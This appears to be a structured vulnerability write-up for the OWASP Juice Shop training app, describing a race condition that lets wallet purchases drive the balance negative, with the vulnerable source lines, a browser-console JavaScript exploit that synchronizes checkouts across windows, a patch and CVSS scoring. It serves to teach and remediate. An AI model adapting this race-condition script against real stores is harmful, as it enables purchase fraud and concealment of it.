## Version 1.4.1
## language: en

Feature:
  TOE:
    Juice-Shop
  Location:
    http://127.0.0.1:3000/#/order-completion/ - Wallet (field)
  Category:
    Web
  CWE:
    CWE-839: Numeric Range Comparison Without Minimum Check
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Buy a item with $ 0 in wallet
  Recommendation:
    Checks the wallet is not negative after a buy

  Background:
  Hacker's software:
    | <Software name>|    <Version>    |
    | Chromium       | 73.0.3683.75    |
    | Windows        | 10.0.1809 (x64) |
  TOE information:
    Given I am accessing the site http://localhost:3000
    And the server is running in NodeJS 10.0
    And is running on Debian

  Scenario: Normal use case
    Given I am accessing the site http://localhost:3000
    And I use the wallet money to pay
    Then I buy a  item

  Scenario: Static detection
    Given ToE source code
    When I inspect "order.js"
    Then I see the vulnerability is being caused by lines 130 to 137
    """
    130    if (req.body.orderDetails.paymentId === 'wallet') {
    131       models.Wallet.decrement({ balance: totalPrice }, {
                where: { UserId: req.body.UserId } }).catch(error => {
    132         next(error)
    133       })
    134     }
    135     models.Wallet.increment({ balance: totalPoints }, {
                where: { UserId: req.body.UserId } }).catch(error => {
    136       next(error)
    137      })
    """
    And I notice that there is not a validation of negative balance
    And can be exploited

  Scenario: Dynamic detection
    When I access to Juice Shop
    Then I try to buy in two browser windows at same time with the wallet money
    And I place one order in the first browser window
    And the purchase is successful and wallet balance is 0
    When I place order in the second browser window
    Then I notice that the purchase is successful
    And I check the balance wallet balance
    And I notice that this value is negative (evidence)[img.png]

  Scenario: Exploitation
    Given I open several browser windows and add items to the basket
    And I write the next JavaSript code in every windows
    """
    var minuteToBuy = CustomMinuteToSincronizeThePurchase

    function sleep(ms) {
      return new Promise(resolve => setTimeout(resolve, ms));
    }
    function getMinute(){
    let today = new Date();
    return today.getMinutes()
    }

    async function buyAtMinute(minute){
      console.log("try..")

      if(minute <= getMinute(minute)){
        continueButton = document.getElementsByClassName("btn-new-address")[1]
        continueButton.click()
        await sleep(1000)
        checkoutButton.click()
      }else{
      setTimeout(function () {buyAtMinute(minute) },50)
          }
    }

    async function exploit() {
      checkoutButton.click()
      await sleep(1000);
      adressButton = document.getElementsByClassName("mat-radio-label")[0]
      adressButton.click()
      continueButton = document.getElementsByClassName("btn-new-address")[1]
      continueButton.click()
      await sleep(1000);
      radioStandar = document.getElementsByClassName("mat-radio-label")[2]
      radioStandar.click()
      continueButton = document.getElementsByClassName("btn-continue")[0]
      continueButton.click()
      await sleep(1000)
      payWalletButton = document.getElementsByClassName("btn-new-address")[0]
      payWalletButton.click()
      buyAtMinute(minuteToBuy)
    }

    exploit()
    """
    When I run the code above
    Then every purchase is successful!
    And my wallet balance is negative

  Scenario: Remediation
    Given I have patched the vulnerability add the following lines
    """
    13   curUserBalance = await models.Wallet.findOne(
            { where: { UserId: req.body.UserId } })
    . ..
    . ..
    126  if ( (curUserBalance.dataValues.balance - totalPrice) < 0  ){
    127    console.log("ERROR")
    128     return false
    129   }
    """
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.3/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.3/10 (Medium) - E:U/RL:T/RC:U/
  Environmental: Unique and relevant attributes to a specific user environment
    4.3/10 (Medium) - CR:L/IR:M/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:L

  Scenario: Correlations
  vbd/juice-shop/0120-place-order-makes-you-rich
    Given I can use this vulnerability and set my Wallet Balance to positive
    And I use both vulnerabilities to hide evidence the negative wallet Balance
